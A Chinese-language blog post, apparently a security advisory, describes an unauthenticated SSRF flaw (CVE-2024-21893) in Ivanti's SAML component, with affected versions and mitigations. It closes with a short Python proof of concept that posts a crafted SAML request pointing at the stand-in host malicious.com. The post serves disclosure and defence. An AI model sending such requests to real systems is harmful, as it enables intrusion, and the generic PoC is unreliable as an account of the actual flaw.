CVE-2024-21893影响Ivanti产品

Administrator 字数: 3092 阅读耗时: 7 分钟 2024/06/21 博客独享热度: 30 评论: 0

CVE-2024-21893漏洞在Ivanti Connect Secure、Ivanti Policy Secure及Ivanti Neurons for ZTA产品中的一个严重服务器端请求伪造（SSRF）漏洞。该漏洞允许攻击者在无需认证的情况下，访问某些受限资源。

漏洞概述

CVE-2024-21893是Ivanti产品中的一个服务器端请求伪造（SSRF）漏洞，主要影响以下版本：

Ivanti Connect Secure：版本 9.x 和 22.x
Ivanti Policy Secure：版本 9.x 和 22.x
Ivanti Neurons for ZTA：所有版本

该漏洞存在于SAML组件中，攻击者可以通过发送特制的请求，利用该漏洞在无需认证的情况下访问系统内的受限资源。

漏洞详情

服务器端请求伪造（SSRF）漏洞允许攻击者通过受害服务器向内部或外部网络发起恶意请求，从而访问或操作本应受限的资源。在此漏洞中，Ivanti产品的SAML组件未能正确验证传入的SAML请求，导致攻击者能够发送特制的SAML请求以访问受限资源。

影响范围

受到该漏洞影响的Ivanti产品包括但不限于：

Ivanti Connect Secure 9.x和22.x版本
Ivanti Policy Secure 9.x和22.x版本
Ivanti Neurons for ZTA所有版本

这些产品广泛应用于企业和组织的网络安全防护中，任何未及时修补漏洞的系统都可能面临攻击风险。

防护措施

及时更新：Ivanti已经发布了相关的安全补丁，用户应立即更新到最新版本以修补该漏洞。请参阅Ivanti的官方公告和更新指南获取详细的更新步骤。
配置调整：在应用补丁前，可临时通过限制SAML请求的来源IP和严格验证SAML请求来降低风险。
监控和检测：实施全面的日志监控和流量分析，检测异常的SAML请求活动，及时发现和响应可能的攻击。

漏洞利用示例

import requests
from urllib.parse import urlparse

def send_ssrf_poc(target_url):
    payload = """<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" AssertionConsumerServiceURL="http://malicious.com/">
                    <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://vulnerable.com</saml:Issuer>
                 </samlp:AuthnRequest>"""
    
    headers = {
        "Content-Type": "text/xml",
        "User-Agent": "Mozilla/5.0"
    }
    
    response = requests.post(target_url, data=payload, headers=headers, verify=False)
    print(f"Sent PoC to {target_url}, response status: {response.status_code}")

target_url = "http://target.com/saml"
send_ssrf_poc(target_url)